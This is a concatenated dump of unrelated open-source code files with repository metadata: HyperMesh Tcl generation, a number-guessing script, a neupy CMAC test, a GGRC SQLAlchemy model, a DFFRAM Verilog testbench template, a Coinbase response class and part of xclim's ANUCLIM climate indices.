0 0 0 0 0") tcl_commands.append("*createmark loads 0 1") tcl_commands.append("*loadsupdatefixedvalue 0 0") def write_tcl_commands_loadsteps(self, tcl_commands: List) -> None: """ Single method to write all tcl commands to the file """ self.write_tcl_commands_loadCollectors(tcl_commands) # create the load step load_step: LoadStep = None for load_step in LoadStep.instances: load_step_id = str(load_step.get_id()) # TODO: should be possible to just use a spc collector - not possible rn. 
spc_loadCollector = load_step.spc_loadCollector load_loadCollector = load_step.load_loadCollector spc_loadCollector_id = str(spc_loadCollector.get_id()) load_loadCollector_id = str(load_loadCollector.get_id()) tcl_commands.append( f"*createmark loadcols 1 \"{spc_loadCollector.name}\" \"{load_loadCollector.name}\"") tcl_commands.append("*createmark outputblocks 1") tcl_commands.append("*createmark groups 1") tcl_commands.append( f"*loadstepscreate \"loadstep_{load_step_id}\" 1") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 4143 1 1 0 1") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 4709 1 1 0 1") tcl_commands.append( f"*setvalue loadsteps id={load_step_id} STATUS=2 4059=1 4060=STATICS") tcl_commands.append( f"*attributeupdateentity loadsteps {load_step_id} 4145 1 1 0 loadcols {spc_loadCollector_id}") tcl_commands.append( f"*attributeupdateentity loadsteps {load_step_id} 4147 1 1 0 loadcols {load_loadCollector_id}") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 3800 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 707 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 2396 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 8134 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 2160 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 10212 1 1 0 0")
[]
islamspahic/python-uup
Lekcija08/script01.py
ea7c9c655ad8e678bca5ee52138836732266799f
tajniBroj = 51
broj = 2

while tajniBroj != broj:
    broj = int(input("Guess the secret number: "))
    if tajniBroj == broj:
        print("Hit!")
    elif tajniBroj < broj:
        print("The secret number is smaller than that number.")
    else:
        print("The secret number is greater than that number.")

print("End of program")
[]
FrostByte266/neupy
tests/algorithms/memory/test_cmac.py
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
import numpy as np from sklearn import metrics from neupy import algorithms from base import BaseTestCase class CMACTestCase(BaseTestCase): def test_cmac(self): X_train = np.reshape(np.linspace(0, 2 * np.pi, 100), (100, 1)) X_train_before = X_train.copy() X_test = np.reshape(np.linspace(np.pi, 2 * np.pi, 50), (50, 1)) y_train = np.sin(X_train) y_train_before = y_train.copy() y_test = np.sin(X_test) cmac = algorithms.CMAC( quantization=100, associative_unit_size=32, step=0.2, verbose=False, ) cmac.train(X_train, y_train, epochs=100) predicted_test = cmac.predict(X_test) predicted_test = predicted_test.reshape((len(predicted_test), 1)) error = metrics.mean_absolute_error(y_test, predicted_test) self.assertAlmostEqual(error, 0.0024, places=4) # Test that algorithm didn't modify data samples np.testing.assert_array_equal(X_train, X_train_before) np.testing.assert_array_equal(X_train, X_train_before) np.testing.assert_array_equal(y_train, y_train_before) self.assertPickledNetwork(cmac, X_train) def test_train_different_inputs(self): self.assertInvalidVectorTrain( network=algorithms.CMAC(), input_vector=np.array([1, 2, 3]), target=np.array([1, 2, 3]) ) def test_predict_different_inputs(self): cmac = algorithms.CMAC() data = np.array([[1, 2, 3]]).T target = np.array([[1, 2, 3]]).T cmac.train(data, target, epochs=100) self.assertInvalidVectorPred( network=cmac, input_vector=np.array([1, 2, 3]), target=target, decimal=2 ) def test_cmac_multi_output(self): X_train = np.linspace(0, 2 * np.pi, 100) X_train = np.vstack([X_train, X_train]) X_test = np.linspace(0, 2 * np.pi, 100) X_test = np.vstack([X_test, X_test]) y_train = np.sin(X_train) y_test = np.sin(X_test) cmac = algorithms.CMAC( quantization=100, associative_unit_size=32, step=0.2, ) cmac.train(X_train, y_train, X_test, y_test, epochs=100) predicted_test = cmac.predict(X_test) error = metrics.mean_absolute_error(y_test, predicted_test) self.assertAlmostEqual(error, 0, places=6) def test_cmac_training_exceptions(self): cmac = algorithms.CMAC( quantization=100, associative_unit_size=32, step=0.2, ) with self.assertRaises(ValueError): cmac.train(X_train=True, y_train=True, X_test=None, y_test=True)
[((371, 386), 'numpy.sin', 'np.sin', (['X_train'], {}), '(X_train)\n', (377, 386), True, 'import numpy as np\n'), ((444, 458), 'numpy.sin', 'np.sin', (['X_test'], {}), '(X_test)\n', (450, 458), True, 'import numpy as np\n'), ((475, 563), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {'quantization': '(100)', 'associative_unit_size': '(32)', 'step': '(0.2)', 'verbose': '(False)'}), '(quantization=100, associative_unit_size=32, step=0.2,\n verbose=False)\n', (490, 563), False, 'from neupy import algorithms\n'), ((805, 856), 'sklearn.metrics.mean_absolute_error', 'metrics.mean_absolute_error', (['y_test', 'predicted_test'], {}), '(y_test, predicted_test)\n', (832, 856), False, 'from sklearn import metrics\n'), ((980, 1034), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['X_train', 'X_train_before'], {}), '(X_train, X_train_before)\n', (1009, 1034), True, 'import numpy as np\n'), ((1043, 1097), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['X_train', 'X_train_before'], {}), '(X_train, X_train_before)\n', (1072, 1097), True, 'import numpy as np\n'), ((1106, 1160), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y_train', 'y_train_before'], {}), '(y_train, y_train_before)\n', (1135, 1160), True, 'import numpy as np\n'), ((1489, 1506), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {}), '()\n', (1504, 1506), False, 'from neupy import algorithms\n'), ((1860, 1890), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (1871, 1890), True, 'import numpy as np\n'), ((1909, 1938), 'numpy.vstack', 'np.vstack', (['[X_train, X_train]'], {}), '([X_train, X_train])\n', (1918, 1938), True, 'import numpy as np\n'), ((1957, 1987), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (1968, 1987), True, 'import numpy as np\n'), ((2005, 2032), 'numpy.vstack', 'np.vstack', (['[X_test, X_test]'], {}), '([X_test, X_test])\n', (2014, 2032), True, 'import numpy as np\n'), ((2052, 2067), 'numpy.sin', 'np.sin', (['X_train'], {}), '(X_train)\n', (2058, 2067), True, 'import numpy as np\n'), ((2085, 2099), 'numpy.sin', 'np.sin', (['X_test'], {}), '(X_test)\n', (2091, 2099), True, 'import numpy as np\n'), ((2116, 2185), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {'quantization': '(100)', 'associative_unit_size': '(32)', 'step': '(0.2)'}), '(quantization=100, associative_unit_size=32, step=0.2)\n', (2131, 2185), False, 'from neupy import algorithms\n'), ((2379, 2430), 'sklearn.metrics.mean_absolute_error', 'metrics.mean_absolute_error', (['y_test', 'predicted_test'], {}), '(y_test, predicted_test)\n', (2406, 2430), False, 'from sklearn import metrics\n'), ((2544, 2613), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {'quantization': '(100)', 'associative_unit_size': '(32)', 'step': '(0.2)'}), '(quantization=100, associative_unit_size=32, step=0.2)\n', (2559, 2613), False, 'from neupy import algorithms\n'), ((197, 227), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (208, 227), True, 'import numpy as np\n'), ((308, 341), 'numpy.linspace', 'np.linspace', (['np.pi', '(2 * np.pi)', '(50)'], {}), '(np.pi, 2 * np.pi, 50)\n', (319, 341), True, 'import numpy as np\n'), ((1523, 1544), 'numpy.array', 'np.array', (['[[1, 2, 3]]'], {}), '([[1, 2, 3]])\n', (1531, 1544), True, 'import numpy as np\n'), ((1564, 1585), 'numpy.array', 'np.array', (['[[1, 2, 3]]'], {}), '([[1, 2, 3]])\n', (1572, 1585), True, 'import numpy 
as np\n'), ((1314, 1331), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {}), '()\n', (1329, 1331), False, 'from neupy import algorithms\n'), ((1358, 1377), 'numpy.array', 'np.array', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1366, 1377), True, 'import numpy as np\n'), ((1398, 1417), 'numpy.array', 'np.array', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1406, 1417), True, 'import numpy as np\n'), ((1723, 1742), 'numpy.array', 'np.array', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1731, 1742), True, 'import numpy as np\n')]
Smotko/ggrc-core
src/ggrc_workflows/models/task_group_object.py
b3abb58b24e7559960d71a94ba79c75539e7fe29
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file> # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> # Created By: [email protected] # Maintained By: [email protected] from sqlalchemy.ext.associationproxy import association_proxy from ggrc import db from ggrc.models.mixins import Mapping from ggrc.models.mixins import Timeboxed from ggrc.models.reflection import PublishOnly class TaskGroupObject(Timeboxed, Mapping, db.Model): __tablename__ = 'task_group_objects' task_group_id = db.Column( db.Integer, db.ForeignKey('task_groups.id'), nullable=False) object_id = db.Column(db.Integer, nullable=False) object_type = db.Column(db.String, nullable=False) @property def object_attr(self): return '{0}_object'.format(self.object_type) @property def object(self): return getattr(self, self.object_attr) @object.setter def object(self, value): self.object_id = value.id if value is not None else None self.object_type = value.__class__.__name__ if value is not None \ else None return setattr(self, self.object_attr, value) @staticmethod def _extra_table_args(cls): return ( db.UniqueConstraint('task_group_id', 'object_id', 'object_type'), db.Index('ix_task_group_id', 'task_group_id'), ) _publish_attrs = [ 'task_group', 'object', ] _sanitize_html = [] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(TaskGroupObject, cls).eager_query() return query.options( orm.subqueryload('task_group')) def _display_name(self): return self.object.display_name + '<->' + self.task_group.display_name def copy(self, _other=None, **kwargs): columns = [ 'task_group', 'object_id', 'object_type' ] target = self.copy_into(_other, columns, **kwargs) return target class TaskGroupable(object): @classmethod def late_init_task_groupable(cls): def make_task_group_objects(cls): cls.task_groups = association_proxy( 'task_group_objects', 'task_group', creator=lambda task_group: TaskGroupObject( task_group=task_group, object_type=cls.__name__, ) ) joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\ 'foreign(TaskGroupObject.object_type) == "{type}")' joinstr = joinstr.format(type=cls.__name__) return db.relationship( 'TaskGroupObject', primaryjoin=joinstr, backref='{0}_object'.format(cls.__name__), cascade='all, delete-orphan', ) cls.task_group_objects = make_task_group_objects(cls) _publish_attrs = [ PublishOnly('task_groups'), 'task_group_objects', ] _include_links = [] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(TaskGroupable, cls).eager_query() return cls.eager_inclusions(query, TaskGroupable._include_links).options( orm.subqueryload('task_group_objects'))
[((653, 690), 'ggrc.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(False)'}), '(db.Integer, nullable=False)\n', (662, 690), False, 'from ggrc import db\n'), ((707, 743), 'ggrc.db.Column', 'db.Column', (['db.String'], {'nullable': '(False)'}), '(db.String, nullable=False)\n', (716, 743), False, 'from ggrc import db\n'), ((590, 621), 'ggrc.db.ForeignKey', 'db.ForeignKey', (['"""task_groups.id"""'], {}), "('task_groups.id')\n", (603, 621), False, 'from ggrc import db\n'), ((2742, 2768), 'ggrc.models.reflection.PublishOnly', 'PublishOnly', (['"""task_groups"""'], {}), "('task_groups')\n", (2753, 2768), False, 'from ggrc.models.reflection import PublishOnly\n'), ((1220, 1284), 'ggrc.db.UniqueConstraint', 'db.UniqueConstraint', (['"""task_group_id"""', '"""object_id"""', '"""object_type"""'], {}), "('task_group_id', 'object_id', 'object_type')\n", (1239, 1284), False, 'from ggrc import db\n'), ((1294, 1339), 'ggrc.db.Index', 'db.Index', (['"""ix_task_group_id"""', '"""task_group_id"""'], {}), "('ix_task_group_id', 'task_group_id')\n", (1302, 1339), False, 'from ggrc import db\n'), ((1591, 1621), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group"""'], {}), "('task_group')\n", (1607, 1621), False, 'from sqlalchemy import orm\n'), ((3035, 3073), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group_objects"""'], {}), "('task_group_objects')\n", (3051, 3073), False, 'from sqlalchemy import orm\n')]
ahmednofal/DFFRAM
verification/tb_template.py
7d7ebc28befe12ec3f232c0d2f5b8ea786227d45
# Copyright ©2020-2021 The American University in Cairo and the Cloud V Project. # # This file is part of the DFFRAM Memory Compiler. # See https://github.com/Cloud-V/DFFRAM for further info. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. RAM_instantiation = """ /* An auto generated testbench to verify RAM{word_num}x{word_size} Authors: Mohamed Shalan ([email protected]) Ahmed Nofal ([email protected]) */ `define VERBOSE_1 `define VERBOSE_2 `define UNIT_DELAY #1 `define USE_LATCH 1 `define SIZE {word_size}/8 //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v" //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v" // // Temporary override: IcarusVerilog cannot read these for some reason ^ `include "hd_primitives.v" `include "hd_functional.v" `include "{filename}" module tb_RAM{word_num}x{word_size}; localparam SIZE = `SIZE; localparam A_W = {addr_width}+$clog2(SIZE); localparam M_SZ = 2**A_W; reg CLK; reg [(SIZE-1):0] WE0; reg EN0; reg [(SIZE*8-1):0] Di0; wire [(SIZE*8-1):0] Do0; reg [A_W-1:0] A0, ADDR; reg [7:0] Phase; reg [7:0] RANDOM_BYTE; event done; RAM{word_num} #(.USE_LATCH(`USE_LATCH), .WSIZE(SIZE)) SRAM ( .CLK(CLK), .WE0(WE0), .EN0(EN0), .Di0(Di0), .Do(Do0), .A0(A0[A_W-1:$clog2(SIZE)]) ); initial begin $dumpfile("tb_RAM{word_num}x{word_size}.vcd"); $dumpvars(0, tb_RAM{word_num}x{word_size}); @(done) $finish; end /* Memory golden Model */ reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0]; reg [(SIZE*8-1):0] RAM_DATA_RW; genvar c; generate for (c=0; c < SIZE; c = c+1) begin: mem_golden_model always @(posedge CLK) begin if(EN0) begin RAM_DATA_RW <= RAM[A0/SIZE]; if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c]; end end end endgenerate """ begin_single_ported_test = """ initial begin CLK = 0; WE0 = 0; EN0 = 1; """ single_ported_custom_test = """ Phase = 0; // Perform a single word write then read mem_write_word({{SIZE{{8'h90}}}}, 4); mem_read_word_0(4); """ RAM_instantiation_1RW1R = """ /* An auto generated testbench to verify RAM{word_num}x{word_size} Authors: Mohamed Shalan ([email protected]) Ahmed Nofal ([email protected]) */ `define VERBOSE_1 `define VERBOSE_2 `define UNIT_DELAY #1 `define USE_LATCH 1 `define SIZE {word_size}/8 //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v" //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v" // // Temporary override: IcarusVerilog cannot read these for some reason ^ `include "hd_primitives.v" `include "hd_functional.v" `include "{filename}" module tb_RAM{word_num}x{word_size}_1RW1R; localparam SIZE = `SIZE; localparam A_W = {addr_width}+$clog2(SIZE); localparam M_SZ = 2**A_W; reg CLK; reg [(SIZE-1):0] WE0; reg EN0; reg ENR; reg [(SIZE*8-1):0] Di0; wire [(SIZE*8-1):0] Do0; wire [(SIZE*8-1):0] Do1; reg [A_W-1:0] A0, A1, ADDR; reg [7:0] Phase; reg [7:0] RANDOM_BYTE; event done; RAM{word_num}_1RW1R #(.USE_LATCH(`USE_LATCH), .WSIZE(`SIZE)) SRAM ( .CLK(CLK), .WE0(WE0), .EN0(EN0), .EN1(ENR), .Di0(Di0), .Do0(Do0), .Do1(Do1), .A0(A0[A_W-1:$clog2(SIZE)]), 
.A1(A1[A_W-1:$clog2(SIZE)]) ); initial begin $dumpfile("tb_RAM{word_num}x{word_size}_1RW1R.vcd"); $dumpvars(0, tb_RAM{word_num}x{word_size}_1RW1R); @(done) $finish; end /* Memory golden Model */ reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0]; reg [(SIZE*8-1):0] RAM_DATA_RW; reg [(SIZE*8-1):0] RAM_DATA_R; genvar c; generate for (c=0; c < SIZE; c = c+1) begin: mem_golden_model always @(posedge CLK) begin if(EN0) begin RAM_DATA_RW <= RAM[A0/SIZE]; if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c]; end if (ENR) begin RAM_DATA_R <= RAM[A1/SIZE]; end end end endgenerate """ begin_dual_ported_test = """ initial begin CLK = 0; WE0 = 0; EN0 = 1; ENR = 1; """ dual_ported_custom_test = """ Phase = 0; // Perform a 2 word write then read 2 words mem_write_word({{SIZE{{8'h90}}}}, 4); mem_write_word({{SIZE{{8'h33}}}}, 8); mem_read_2words(4,8); """ start_test_common = """ always #10 CLK = !CLK; integer i; """ test_port_1RW1R = """ /*********************************************************** Write and read from different ports ************************************************************/ // Fill the memory with a known pattern // Word Write then Read Phase = 1; `ifdef VERBOSE_1 $display("\\nFinished Phase 0, starting Phase 1"); `endif for(i=0; i<M_SZ; i=i+SIZE) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ; RANDOM_BYTE = $urandom; mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR); mem_read_word_1( ADDR ); end // HWord Write then Read Phase = 2; `ifdef VERBOSE_1 $display("\\nFinished Phase 1, starting Phase 2"); `endif for(i=0; i<M_SZ; i=i+SIZE/2) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE; RANDOM_BYTE = $urandom; mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR); mem_read_word_1( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end // Byte Write then Read Phase = 3; `ifdef VERBOSE_1 $display("\\nFinished Phase 2, starting Phase 3"); `endif for(i=0; i<M_SZ; i=i+1) begin ADDR = (($urandom%M_SZ)); mem_write_byte($urandom%255, ADDR); mem_read_word_1(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end """ test_port_RW = """ /*********************************************************** Write and read from same port ************************************************************/ Phase = 4; `ifdef VERBOSE_1 $display("\\nFinished Phase 3, starting Phase 4"); `endif for(i=0; i<M_SZ; i=i+SIZE) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ; RANDOM_BYTE = $urandom; mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR); mem_read_word_0( ADDR ); end // HWord Write then Read Phase = 5; `ifdef VERBOSE_1 $display("\\nFinished Phase 4, starting Phase 5"); `endif for(i=0; i<M_SZ; i=i+SIZE/2) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE; RANDOM_BYTE = $urandom; mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR); mem_read_word_0( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end // Byte Write then Read Phase = 6; `ifdef VERBOSE_1 $display("\\nFinished Phase 5, starting Phase 6"); `endif for(i=0; i<M_SZ; i=i+1) begin ADDR = (($urandom%M_SZ)); mem_write_byte($urandom%255, ADDR); mem_read_word_0(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end $display ("\\n>> Test Passed! 
<<\\n"); -> done; """ end_test = """ end """ tasks = """ task mem_write_byte(input [7:0] byte, input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr;//[A_WIDTH:2]; WE0 = (1 << addr[$clog2(SIZE)-1:0]); Di0 = (byte << (addr[$clog2(SIZE)-1:0] * 8)); @(posedge CLK); `ifdef VERBOSE_2 $display("WRITE BYTE: 0x%X to %0X(%0D) (0x%X, %B)", byte, addr, addr, Di0, WE0); `endif WE0 = {SIZE{8'h00}}; end endtask task mem_write_hword(input [SIZE*8-1:0] hword, input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr;//[A_WIDTH:$clog2(SIZE)]; WE0 = {{SIZE/2{addr[$clog2(SIZE)-1]}},{SIZE/2{~addr[$clog2(SIZE)-1]}}}; Di0 = (hword << (addr[$clog2(SIZE)-1] * (SIZE/2)*8)); @(posedge CLK); `ifdef VERBOSE_2 $display("WRITE HWORD: 0x%X to %0X(%0D) (0x%X, %B)", hword, addr, addr, Di0, WE0); `endif WE0 = {SIZE{8'h00}}; end endtask task mem_write_word(input [SIZE*8-1:0] word, input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr; WE0 = {SIZE{8'hFF}}; Di0 = word; @(posedge CLK); `ifdef VERBOSE_2 $display("WRITE WORD: 0x%X to %0X(%0D) (0x%X, %B)", word, addr, addr, Di0, WE0); `endif WE0 = {SIZE{8'h00}}; end endtask task mem_read_word_0(input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr;//[9:2]; WE0 = {SIZE{8'h00}}; @(posedge CLK); #5; `ifdef VERBOSE_2 $display("READ WORD: 0x%X from %0D", Do0, addr); `endif check0(); end endtask task check0; begin if(RAM_DATA_RW !== Do0) begin $display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i); $display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A0, Do0, RAM[A0/SIZE]); $fatal(1); end end endtask """ dual_ported_tasks = """ task mem_read_2words(input [A_W-1:0] addr0, input [A_W-1:0] addr1); begin @(posedge CLK); A0= addr0;//[9:2]; A1= addr1;//[9:2]; WE0 = {SIZE{8'h00}}; @(posedge CLK); #5; `ifdef VERBOSE_2 $display("READ WORD0: 0x%X from %0D", Do0, addr0); $display("READ WORD1: 0x%X from %0D", Do1, addr1); `endif check0(); check1(); end endtask task mem_read_word_1(input [A_W-1:0] addr); begin @(posedge CLK); A1 = addr;//[9:2]; WE0 = {SIZE{8'h00}}; @(posedge CLK); #5; `ifdef VERBOSE_2 $display("READ WORD: 0x%X from %0D", Do1, addr); `endif check1(); end endtask task check1; begin if(RAM_DATA_R !== Do1) begin $display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i); $display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A1, Do1, RAM[A1/SIZE]); $fatal(1); end end endtask """ endmodule = """ endmodule """
[]
krystianbajno/stocks
services/stocks-api/app/api/clients/coinbase/CoinbaseResponse.py
0a1a9283cb6debe36cfe01308eb4bc0b85217a02
class CoinbaseResponse:
    bid = 0
    ask = 0
    product_id = None

    def set_bid(self, bid):
        self.bid = float(bid)

    def get_bid(self):
        return self.bid

    def set_ask(self, ask):
        self.ask = float(ask)

    def get_ask(self):
        return self.ask

    def get_product_id(self):
        return self.product_id

    def set_product_id(self, product_id):
        self.product_id = product_id
[]
bzah/xclim
xclim/indices/_anuclim.py
18ceee3f1db2d39355913c1c60ec32ddca6baccc
# noqa: D100 from typing import Optional import numpy as np import xarray from xclim.core.units import ( convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint, ) from xclim.core.utils import ensure_chunk_size from ._multivariate import ( daily_temperature_range, extreme_temperature_range, precip_accumulation, ) from ._simple import tg_mean from .generic import select_resample_op from .run_length import lazy_indexing # Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start # See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases # -------------------------------------------------- # # ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! # # -------------------------------------------------- # __all__ = [ "temperature_seasonality", "precip_seasonality", "tg_mean_warmcold_quarter", "tg_mean_wetdry_quarter", "prcptot_wetdry_quarter", "prcptot_warmcold_quarter", "prcptot", "prcptot_wetdry_period", "isothermality", ] _xr_argops = { "wettest": xarray.DataArray.argmax, "warmest": xarray.DataArray.argmax, "dryest": xarray.DataArray.argmin, "driest": xarray.DataArray.argmin, "coldest": xarray.DataArray.argmin, } _np_ops = { "wettest": "max", "warmest": "max", "dryest": "min", "driest": "min", "coldest": "min", } @declare_units(tasmin="[temperature]", tasmax="[temperature]") def isothermality( tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS" ) -> xarray.DataArray: r"""Isothermality. The mean diurnal range divided by the annual temperature range. Parameters ---------- tasmin : xarray.DataArray Average daily minimum temperature at daily, weekly, or monthly frequency. tasmax : xarray.DataArray Average daily maximum temperature at daily, weekly, or monthly frequency. freq : str Resampling frequency. Returns ------- xarray.DataArray, [%] Isothermality Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq) etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq) with xarray.set_options(keep_attrs=True): iso = dtr / etr * 100 iso.attrs["units"] = "%" return iso @declare_units(tas="[temperature]") def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray: r"""ANUCLIM temperature seasonality (coefficient of variation). The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation of temperature values for a given year expressed as a percentage of the mean of those temperatures. Parameters ---------- tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. Returns ------- xarray.DataArray, [%] Mean temperature coefficient of variation Examples -------- The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality: >>> import xclim.indices as xci >>> t = xr.open_dataset(path_to_tas_file).tas >>> tday_seasonality = xci.temperature_seasonality(t) >>> t_weekly = xci.tg_mean(t, freq='7D') >>> tweek_seasonality = xci.temperature_seasonality(t_weekly) Notes ----- For this calculation, the mean in degrees Kelvin is used. 
This avoids the possibility of having to divide by zero, but it does mean that the values are usually quite small. According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ tas = convert_units_to(tas, "K") with xarray.set_options(keep_attrs=True): seas = 100 * _anuclim_coeff_var(tas) seas.attrs["units"] = "%" return seas @declare_units(pr="[precipitation]") def precip_seasonality( pr: xarray.DataArray, ) -> xarray.DataArray: r"""ANUCLIM Precipitation Seasonality (C of V). The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation of precipitation values for a given year expressed as a percentage of the mean of those values. Parameters ---------- pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. Units need to be defined as a rate (e.g. mm d-1, mm week-1). Returns ------- xarray.DataArray, [%] Precipitation coefficient of variation Examples -------- The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality: >>> import xclim.indices as xci >>> p = xr.open_dataset(path_to_pr_file).pr >>> pday_seasonality = xci.precip_seasonality(p) >>> p_weekly = xci.precip_accumulation(p, freq='7D') # Input units need to be a rate >>> p_weekly.attrs['units'] = "mm/week" >>> pweek_seasonality = xci.precip_seasonality(p_weekly) Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator values. """ # If units in mm/sec convert to mm/days to avoid potentially small denominator if units2pint(pr) == units("mm / s"): pr = convert_units_to(pr, "mm d-1") with xarray.set_options(keep_attrs=True): seas = 100 * _anuclim_coeff_var(pr) seas.attrs["units"] = "%" return seas @declare_units(tas="[temperature]") def tg_mean_warmcold_quarter( tas: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS", ) -> xarray.DataArray: r"""ANUCLIM Mean temperature of warmest/coldest quarter. The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise as 3 months. Parameters ---------- tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. op : str {'warmest', 'coldest'} Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [same as tas] Mean temperature values of the {op} quearter of each year. 
Examples -------- The following would compute for each grid cell of file `tas.day.nc` the annual temperature warmest quarter mean temperature: >>> import xclim.indices as xci >>> t = xr.open_dataset(path_to_tas_file) >>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily') Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ out = _to_quarter(src_timestep, tas=tas) oper = _np_ops[op] out = select_resample_op(out, oper, freq) out.attrs["units"] = tas.units return out @declare_units(tas="[temperature]", pr="[precipitation]") def tg_mean_wetdry_quarter( tas: xarray.DataArray, pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS", ) 